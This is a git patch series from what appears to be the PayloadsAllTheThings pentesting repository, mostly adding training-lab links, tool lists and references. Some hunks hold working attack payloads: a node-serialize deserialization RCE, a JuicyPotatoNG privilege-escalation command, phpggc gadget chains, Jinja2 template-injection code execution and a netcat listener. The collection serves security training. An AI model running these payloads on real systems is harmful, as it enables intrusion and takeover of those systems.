index 0000000..8a9147a --- /dev/null +++ b/Insecure Deserialization/Node.md @@ -0,0 +1,34 @@ +# Node + +## Summary + +* [Exploit](#exploit) +* [References](#references) + +## Exploit + +> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE). + +1. Generate a serialized payload + ```js + var y = { + rce : function(){ + require('child_process').exec('ls /', function(error, + stdout, stderr) { console.log(stdout) }); + }, + } + var serialize = require('node-serialize'); + console.log("Serialized: \n" + serialize.serialize(y)); + ``` +2. Add bracket `()` to force the execution + ```js + {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"} + ``` +3. Send the payload + + +## References + +* [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) +* [NodeJS Deserialization - 8 January 2020- gonczor](https://blacksheephacks.pl/nodejs-deserialization/) +* [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - 02/09/2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 35cc70a..a58d456 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -1289,6 +1289,14 @@ C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe EfsPotato.cs C:\Windows\Microsoft.Net\Framework\V3.5\csc.exe /platform:x86 EfsPotato.cs ``` +### JuicyPotatoNG + +* [antonioCoco/JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) + +```powershell +JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami" > C:\juicypotatong.txt +``` + ## EoP - Privileged File Write @@ -1505,4 +1513,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com * [Abusing SeLoadDriverPrivilege for privilege escalation - 14 JUN 2018 - OSCAR MALLO](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/) * [Universal Privilege Escalation and Persistence – Printer - AUGUST 2, 2021)](https://pentestlab.blog/2021/08/02/universal-privilege-escalation-and-persistence-printer/) * [ABUSING ARBITRARY FILE DELETES TO ESCALATE PRIVILEGE AND OTHER GREAT TRICKS - March 17, 2022 | Simon Zuckerbraun](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) -* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) \ No newline at end of file +* [Bypassing AppLocker by abusing HashInfo - 2022-08-19 - Ian](https://shells.systems/post-bypassing-applocker-by-abusing-hashinfo/) +* [Giving JuicyPotato a second chance: JuicyPotatoNG - @decoder_it, @splinter_code](https://decoder.cloud/2022/09/21/giving-juicypotato-a-second-chance-juicypotatong/) \ No newline at end of file From b7d275d5b005ad8f0f0e1496641d76824d242845 Mon Sep 17 00:00:00 2001 From: Markus Date: Sat, 1 Oct 2022 17:20:51 +0200 Subject: [PATCH 43/69] Api Key Leaks: Add Trivy to tools section --- API Key Leaks/README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 8438d2c..f1c9369 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -24,15 +24,16 @@ ## Tools - [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder) -- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) -- [truffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) +- [KeyHacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks) +- [TruffleHog - Find credentials all over the place](https://github.com/trufflesecurity/truffleHog) ```ps1 docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity trufflehog git https://github.com/trufflesecurity/trufflehog.git trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 ``` - +- [Trivy - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets](https://github.com/aquasecurity/trivy) + ## Exploit The following commands can be used to takeover accounts or extract personal information from the API using the leaked token. From 9f0c70d46f6d0020e176afd421f0f24c81206867 Mon Sep 17 00:00:00 2001 From: Deep Dhakate <75447837+InTruder-Sec@users.noreply.github.com> Date: Sat, 1 Oct 2022 19:56:49 +0000 Subject: [PATCH 44/69] update --- Account Takeover/README.md | 7 +++++++ CORS Misconfiguration/README.md | 7 +++++++ CRLF Injection/README.md | 3 +++ CSRF Injection/README.md | 12 ++++++++++++ 4 files changed, 29 insertions(+) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index 5db6c97..b30e286 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -254,6 +254,13 @@ Enter the code **000000** or **null** to bypass 2FA protection. * Session hijacking * OAuth misconfiguration +## Labs + +* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow) +* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking) +* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri) +* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page) +* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect) ## References diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index 12f8dad..b4f2b38 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -244,6 +244,13 @@ function reqListener() { }; ``` +## Labs + +* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack) +* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack) +* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack) +* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack) + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 04fe4f8..14f3eeb 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -103,6 +103,9 @@ Remainder: * %E5%98%BE = %3E = \u563e (>) * %E5%98%BC = %3C = \u563c (<) +## Labs + +* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) ## Exploitation Tricks * Try to search for parameters that lead to redirects and fuzz them diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md index f6eb20b..a04796b 100644 --- a/CSRF Injection/README.md +++ b/CSRF Injection/README.md @@ -160,6 +160,18 @@ Referer: https://attacker.com/csrf.html;trusted.domain.com Referer: https://trusted.domain.com.attacker.com/csrf.html ``` +## Labs + +* [CSRF vulnerability with no defenses](https://portswigger.net/web-security/csrf/lab-no-defenses) +* [CSRF where token validation depends on request method](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-request-method) +* [CSRF where token validation depends on token being present](https://portswigger.net/web-security/csrf/lab-token-validation-depends-on-token-being-present) +* [CSRF where token is not tied to user session](https://portswigger.net/web-security/csrf/lab-token-not-tied-to-user-session) +* [CSRF where token is tied to non-session cookie](https://portswigger.net/web-security/csrf/lab-token-tied-to-non-session-cookie) +* [CSRF where token is duplicated in cookie](https://portswigger.net/web-security/csrf/lab-token-duplicated-in-cookie) +* [CSRF where Referer validation depends on header being present](https://portswigger.net/web-security/csrf/lab-referer-validation-depends-on-header-being-present) +* [CSRF with broken Referer validation](https://portswigger.net/web-security/csrf/lab-referer-validation-broken) + + ## References - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/) From bd6a1b759ab60999feb580244af16e1afe8d9844 Mon Sep 17 00:00:00 2001 From: Markus Date: Sat, 1 Oct 2022 22:04:49 +0200 Subject: [PATCH 45/69] Java RMI: Add remote-method-guesser to tools This also includes slight adjustments to the README.md to adhere to the current contribution example layout --- Java RMI/README.md | 69 ++++++++++++++++++++++++++++++++++++---------- 1 file changed, 55 insertions(+), 14 deletions(-) diff --git a/Java RMI/README.md b/Java RMI/README.md index 97b33fa..c5e8fc9 100644 --- a/Java RMI/README.md +++ b/Java RMI/README.md @@ -1,25 +1,27 @@ # Java RMI -> The attacker can host a MLet file and instruct the JMX service to load MBeans from the remote host. +> Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE. +> One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out +> using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together +> with a summary of currently known attack techniques. ## Summary +* [Tools](#tools) +* [Detection](#detection) * [Exploitation](#exploitation) - * [Requirements](#requirements) - * [Detection](#detection) - * [Remote Command Execution](#remote-command-execution) + * [RCE using sjet/mjet](#rce-using-sjet-or-mjet) * [References](#references) -## Exploitation +## Tools -### Requirements -- Jython -- The JMX server can connect to a http service that is controlled by the attacker -- JMX authentication is not enabled +- [sjet](https://github.com/siberas/sjet) +- [mjet](https://github.com/mogwailabs/mjet) +- [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) +## Detection -### Detection - +Using [nmap](https://nmap.org/): ```powershell $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v 1089/tcp open java-rmi Java RMI @@ -33,7 +35,45 @@ $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TA | javax.management.remote.rmi.RMIServerImpl_Stub ``` -### Remote Command Execution +Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): +```bash +$ rmg scan 172.17.0.2 --ports 0-65535 +[+] Scanning 6225 Ports on 172.17.0.2 for RMI services. +[+] +[+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC) +[+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC) +[+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC) +[+] [6234 / 6234] [#############################] 100% +[+] +[+] Portscan finished. +``` + +```bash +$ rmg enum 172.17.0.2 9010 +[+] RMI registry bound names: +[+] +[+] - plain-server2 +[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) +[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] +[+] - legacy-service +[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) +[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] +[+] - plain-server +[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) +[+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] +[...] +``` + +## Exploitation + +### RCE using sjet or mjet + +#### Requirements +- Jython +- The JMX server can connect to a http service that is controlled by the attacker +- JMX authentication is not enabled + +#### Remote Command Execution The attack involves the following steps: * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans @@ -59,5 +99,6 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret shell ## References -* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH - 28 APR 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) -* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security - 26th March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) +* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) +* [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) +* [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal) From a670a26eeabd6ed01084a6b8389a1ca3d0ac59a7 Mon Sep 17 00:00:00 2001 From: Deep Dhakate <75447837+InTruder-Sec@users.noreply.github.com> Date: Sun, 2 Oct 2022 06:13:01 +0000 Subject: [PATCH 46/69] Update --- Account Takeover/README.md | 7 ------- Directory Traversal/README.md | 8 ++++++++ Insecure Deserialization/README.md | 4 ++++ Insecure Direct Object References/README.md | 4 ++++ JSON Web Token/README.md | 9 +++++++++ OAuth/README.md | 9 +++++++++ Open Redirect/README.md | 4 ++++ SQL Injection/README.md | 7 +++++++ Server Side Request Forgery/README.md | 8 ++++++++ Upload Insecure Files/README.md | 4 ++++ Web Cache Deception/README.md | 3 +++ Web Sockets/README.md | 4 ++++ XSS Injection/README.md | 4 ++++ XXE Injection/README.md | 3 +++ 14 files changed, 71 insertions(+), 7 deletions(-) diff --git a/Account Takeover/README.md b/Account Takeover/README.md index b30e286..5db6c97 100644 --- a/Account Takeover/README.md +++ b/Account Takeover/README.md @@ -254,13 +254,6 @@ Enter the code **000000** or **null** to bypass 2FA protection. * Session hijacking * OAuth misconfiguration -## Labs - -* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow) -* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking) -* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri) -* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page) -* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect) ## References diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 665af6c..eea6bfa 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -194,6 +194,14 @@ The following log files are controllable and can be included with an evil payloa /var/log/sshd.log /var/log/mail ``` +## Labs + +* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple) +* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass) +* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively) +* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode) +* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path) +* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass) ## References diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index 6faf500..a62322f 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -10,6 +10,10 @@ Check the following sub-sections, located in other files : * [Python : pickle, ...](Python.md) * [YAML : PyYAML, ...](YAML.md) +## LABS + +* [Insecure Deserialization 10 labs](https://portswigger.net/web-security/all-labs#insecure-deserialization) + ## References * [Github - ysoserial](https://github.com/frohoff/ysoserial) diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index 6b4dba2..6f240a8 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -48,6 +48,10 @@ http://foo.bar/accessPage?menuitem=12 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789) * [HackerOne - IDOR on HackerOne Feedback Review - japz](https://hackerone.com/reports/262661) +## Labs + +* [Insecure direct object references](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) + ## References * [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index e04d378..242a9a9 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -287,6 +287,15 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret * CVE-2019-20933/CVE-2020-28637 - Blank password vulnerability * CVE-2020-28042 - Null signature vulnerability +## Labs + +* [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature) +* [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification) +* [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key) +* [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection) +* [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection) +* [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal) + ## References - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) diff --git a/OAuth/README.md b/OAuth/README.md index 4e728c5..478f03b 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -62,6 +62,15 @@ Applications that do not check for a valid CSRF token in the OAuth callback are > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request. +## Labs + +* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow) +* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking) +* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri) +* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page) +* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect) + + ## References * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) diff --git a/Open Redirect/README.md b/Open Redirect/README.md index badb20c..fe14b59 100644 --- a/Open Redirect/README.md +++ b/Open Redirect/README.md @@ -178,6 +178,10 @@ http://www.example.com/redirect.php?url=javascript:prompt(1) ?continue={payload} ?return_path={payload} ``` +## Labs + +* [DOM-based open redirection](https://portswigger.net/web-security/dom-based/open-redirection/lab-dom-open-redirection) + ## References diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 1827c28..f582268 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -612,6 +612,13 @@ Obfuscated query 1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2 ``` +## Labs + +* [SQL injection vulnerability in WHERE clause allowing retrieval of hidden data](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data) +* [SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass) +* [SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) +* [SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection) + ## References * Detect SQLi diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 9db678d..a79bf37 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -829,6 +829,14 @@ curl http://rancher-metadata// More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/ +## Labs + +* [Basic SSRF against the local server](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost) +* [Basic SSRF against another back-end system](https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system) +* [SSRF with blacklist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter) +* [SSRF with whitelist-based input filter](https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter) +* [SSRF with filter bypass via open redirection vulnerability](https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection) + ## References diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index 1eb363d..03d57bb 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -191,6 +191,10 @@ When a ZIP/archive file is automatically decompressed after the upload Upload the XML file to `$JETTY_BASE/webapps/` * [JettyShell.xml - From Mikhail Klyuchnikov](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml) +## Labs + +* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) + ## References diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index 50b28e5..6918db5 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -49,6 +49,9 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page "> ``` +## Labs + +* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) ## References diff --git a/Web Sockets/README.md b/Web Sockets/README.md index ffe7ec0..ea11043 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -59,6 +59,10 @@ application uses a `Sec-WebSocket-Protocol` header in the handshake request, you have to add this value as a 2nd parameter to the `WebSocket` function call in order to add this header. +## Labs + +* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling) + ## References - [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 44b9b06..6cb88ea 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -1227,6 +1227,10 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e ``` +## Labs + +* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting) + ## References - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 826cdda..8136e66 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -592,6 +592,9 @@ we can convert the character encoding to `UTF-16` using [iconv](https://man7.org cat utf8exploit.xml | iconv -f UTF-8 -t UTF-16BE > utf16exploit.xml ``` +## Labs + +* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection) ## References From 4ed3e3b6b9484f1b271408be2d7801055976823e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 2 Oct 2022 12:24:39 +0200 Subject: [PATCH 47/69] Blind SSTI Jinja --- Insecure Deserialization/PHP.md | 1 + .../Active Directory Attack.md | 2 +- README.md | 2 +- Server Side Template Injection/README.md | 23 +++++++++++++++---- 4 files changed, 22 insertions(+), 6 deletions(-) diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md index 46f73b9..2a46efb 100644 --- a/Insecure Deserialization/PHP.md +++ b/Insecure Deserialization/PHP.md @@ -133,6 +133,7 @@ Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. ```powershell phpggc monolog/rce1 'phpinfo();' -s +phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini ``` ## PHP Phar Deserialization diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index c15d1da..25ade01 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -2225,7 +2225,7 @@ secretsdump.py -k -no-pass target.lab.local * Find ADCS Server * `crackmapexec ldap domain.lab -u username -p password -M adcs` * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` -* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping` +* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` #### ESC1 - Misconfigured Certificate Templates diff --git a/README.md b/README.md index 9a79b30..2f1c197 100644 --- a/README.md +++ b/README.md @@ -9,7 +9,7 @@ You can also contribute with a :beers: IRL, or using the sponsor button [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo) [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/) -An alternative display version is available at https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/. +An alternative display version is available at [PayloadsAllTheThingsWeb](https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/).

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 4aeb0ab..9d3d392 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -43,6 +43,7 @@ - [Jinja2 - Read remote file](#jinja2---read-remote-file) - [Jinja2 - Write into remote file](#jinja2---write-into-remote-file) - [Jinja2 - Remote Code Execution](#jinja2---remote-code-execution) + - [Forcing output on blind RCE](#jinja2---forcing-output-on-blind-rce) - [Exploit the SSTI by calling os.popen().read()](#exploit-the-ssti-by-calling-ospopenread) - [Exploit the SSTI by calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen) - [Exploit the SSTI by calling Popen without guessing the offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset) @@ -496,15 +497,30 @@ Listen for connection nc -lnvp 8000 ``` +#### Jinja2 - Forcing output on blind RCE + +You can import Flask functions to return an output from the vulnerable page. + +```py +{{ +x.__init__.__builtins__.exec("from flask import current_app, after_this_request +@after_this_request +def hook(*args, **kwargs): + from flask import make_response + r = make_response('Powned') + return r +") +}} +``` + + #### Exploit the SSTI by calling os.popen().read() These payloads are context-free, and do not require anything, except being in a jinja2 Template object: ```python {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} - {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} - {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }} ``` @@ -512,9 +528,7 @@ We can use these shorter payloads (this is the shorter payloads known yet): ```python {{ cycler.__init__.__globals__.os.popen('id').read() }} - {{ joiner.__init__.__globals__.os.popen('id').read() }} - {{ namespace.__init__.__globals__.os.popen('id').read() }} ``` @@ -1092,3 +1106,4 @@ layout template: * [Exploiting Less.js to Achieve RCE](https://www.softwaresecured.com/exploiting-less-js/) * [A Pentester's Guide to Server Side Template Injection (SSTI)](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti) * [Django Templates Server-Side Template Injection](https://lifars.com/wp-content/uploads/2021/06/Django-Templates-Server-Side-Template-Injection-v1.0.pdf) +* [#HITB2022SIN #LAB Template Injection On Hardened Targets - Lucas 'BitK' Philippe](https://youtu.be/M0b_KA0OMFw) \ No newline at end of file From 99a1304af9f3ce743682526aca1a6c788daacb52 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 2 Oct 2022 13:13:16 +0200 Subject: [PATCH 48/69] Methodology and enumeration rework --- .../Methodology and enumeration.md | 192 ++++++------------ 1 file changed, 57 insertions(+), 135 deletions(-) diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index d74ff32..e0bd4f2 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md @@ -6,97 +6,58 @@ * Shodan * Wayback Machine * The Harvester + * Github OSINT * [Active Recon](#active-recon) - * Network discovery - * RPCClient - * Enum4all - -* [List all the subdirectories and files](#list-all-the-subdirectories-and-files) - * Gobuster - * Backup File Artifacts Checker + * [Network discovery](#network-discovery) + * [Web discovery](#web-discovery) * [Web 